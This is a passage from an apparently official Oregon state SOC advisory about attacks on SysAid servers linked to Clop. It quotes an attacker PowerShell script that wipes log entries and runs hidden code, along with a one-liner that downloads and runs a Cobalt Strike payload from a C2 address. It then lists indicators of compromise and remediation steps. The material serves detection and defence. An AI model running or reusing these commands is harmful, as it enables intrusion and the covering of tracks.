<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>while(1) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>sleep 5;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>if(!(Test-Path "$tomcat_dir\webapps\usersfiles.war")) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     while((Test-Path "$tomcat_dir\webapps\usersfiles")) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>         sleep 1;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     break;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>if((Test-Path "$tomcat_dir\webapps\usersfiles\leave")) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     sleep 5;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     break;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>else {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$s=$env:SehCore;$env:SehCore="";Invoke-Expression $s;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p> </o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The script performs the following actions:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level1 lfo8"><span style="mso-bookmark:_Hlk122600425">Sleeps for 5 seconds to allow time for the exploit to complete fully.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level1 lfo8"><span style="mso-bookmark:_Hlk122600425">Removes any lines in log files found within the SysAidServer\root\WEB-INF\logs and SysAidServer\tomcat\logs directories which match the following
 patterns:<o:p></o:p></span></li><ul style="margin-top:0in" type="circle">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level2 lfo8"><span style="mso-bookmark:_Hlk122600425">userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level2 lfo8"><span style="mso-bookmark:_Hlk122600425">userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731<o:p></o:p></span></li></ul>
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level1 lfo8"><span style="mso-bookmark:_Hlk122600425">Waits for the usersfiles.war deployment to be removed (or for the “leave” flag file to appear), re-runs the log cleanup, and finally reads additional PowerShell from the SehCore environment variable, clears that variable, and executes the retrieved content with Invoke-Expression.<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following PowerShell command was used to download and execute a Cobalt Strike payload on victim hosts (the IP address is shown defanged):<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Post-Exploit</u></b>: Indicators of compromise can be found below:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Hashes<o:p></o:p></span></p>
<table class="MsoTableGrid" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse;border:none">
<tbody>
<tr>
<td width="78" valign="top" style="width:58.2pt;border:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Filename<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="476" valign="top" style="width:357.25pt;border:solid windowtext 1.0pt;border-left:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Sha256<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="124" valign="top" style="width:92.75pt;border:solid windowtext 1.0pt;border-left:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Comment<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="78" valign="top" style="width:58.2pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">User.exe<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="476" valign="top" style="width:357.25pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="124" valign="top" style="width:92.75pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Malicious loader<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
</tbody>
</table>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b>IP Addresses<o:p></o:p></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<table class="MsoTableGrid" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse;border:none">
<tbody>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">IP<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border:solid windowtext 1.0pt;border-left:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Comment<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">81.19.138[.]52<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">GraceWire Loader C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">45.182.189[.]100<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">GraceWire Loader C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">179.60.150[.]34<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Cobalt Strike C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">45.155.37[.]105<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Meshagent remote admin tool C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
</tbody>
</table>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b>File Paths<o:p></o:p></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="780" style="width:585.0pt;background:#F9F9F9;border-collapse:collapse">
<tbody>
<tr>
<td style="border:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Path</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border:solid windowtext 1.0pt;border-left:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Comment</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td style="border:solid windowtext 1.0pt;border-top:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">GraceWire</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td style="border:solid windowtext 1.0pt;border-top:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Archive of WebShells and tools used by the attacker</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td style="border:solid windowtext 1.0pt;border-top:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">C:\Program Files\SysAidServer\tomcat\webapps\leave</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Used as a flag file by the attacker scripts during execution (the cleanup script above checks for it under webapps\usersfiles\)</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
</tbody>
</table>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425"><b>Antivirus Detections<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Microsoft Defender detects the components of this attack as the following threats:<o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoNormal" style="margin-bottom:12.0pt;mso-list:l7 level1 lfo9"><span style="mso-bookmark:_Hlk122600425">Trojan:Win32/TurtleLoader<o:p></o:p></span></li><li class="MsoNormal" style="margin-bottom:12.0pt;mso-list:l7 level1 lfo9"><span style="mso-bookmark:_Hlk122600425">Backdoor:Win32/Clop<o:p></o:p></span></li><li class="MsoNormal" style="margin-bottom:12.0pt;mso-list:l7 level1 lfo9"><span style="mso-bookmark:_Hlk122600425">Ransom:Win32/Clop<o:p></o:p></span></li></ul>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425"><b>Post-Compromise Cleanup<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">After initial compromise, the attacker cleans up the payloads used to establish an initial foothold on the infected servers. Evidence of the following commands having been run
 on SysAid servers indicates successful exploitation:<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave"<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Remove-Item -Force "$wapps\usersfiles.war"<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Remove-Item -Force "$wapps\usersfiles\user.*"<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">& "$wapps\usersfiles\user.exe"<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">As of November 13, 2023, there are no Tenable plugins for this vulnerability, and none are in the pipeline.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Recommended Actions</u></b>:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"> <o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoNormal" style="mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Verify that hosts have not been compromised (using the indicators above) before applying patches.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Apply the appropriate updates provided by the vendor to vulnerable systems immediately after appropriate testing.<o:p></o:p></span></li><li class="MsoNormal" style="mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.<o:p></o:p></span></li><li class="MsoNormal" style="mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Apply the Principle of Least Privilege to all systems and services.<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<span style="mso-bookmark:_Hlk122600425"></span>
<table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="702" style="width:526.5pt;border-collapse:collapse">
<tbody>
<tr style="height:63.0pt">
<td width="118" valign="top" style="width:88.35pt;padding:0in 4.65pt 0in 4.65pt;height:63.0pt">
<p class="MsoNormal" style="line-height:105%"><span style="color:#1F497D"><img border="0" width="121" height="87" style="width:1.2583in;height:.9083in" id="Picture_x0020_4" src="cid:image001.png@01DA1614.36201480"><span style="mso-ligatures:none"><o:p></o:p></span></span></p>
</td>
<td width="493" valign="top" style="width:369.65pt;padding:0in 4.65pt 0in 4.65pt;height:63.0pt">
<p class="MsoNormal" style="line-height:105%"><b><span style="mso-ligatures:none">Cyber Security Services<o:p></o:p></span></b></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">State of Oregon Cyber Security Services<o:p></o:p></span></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">Enterprise Information Services | SOC<o:p></o:p></span></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">Cyber Security Services (CSS)<o:p></o:p></span></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">SOC Hotline: (503) 378-5930 | SOC Services (503) 373-0378<span style="color:#1F497D"><o:p></o:p></span></span></p>
</td>
</tr>
<tr>
<td width="611" colspan="2" valign="top" style="width:458.05pt;padding:0in 4.65pt 0in 4.65pt">
<p class="MsoNormal" style="line-height:105%"><i><span style="color:#2E74B5;mso-ligatures:none">“Ensuring user-friendly, reliable and secure state technology systems that serve Oregonians.”<o:p></o:p></span></i></p>
</td>
</tr>
</tbody>
</table>
<p class="MsoNormal"><o:p> </o:p></p>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
</body>
</html>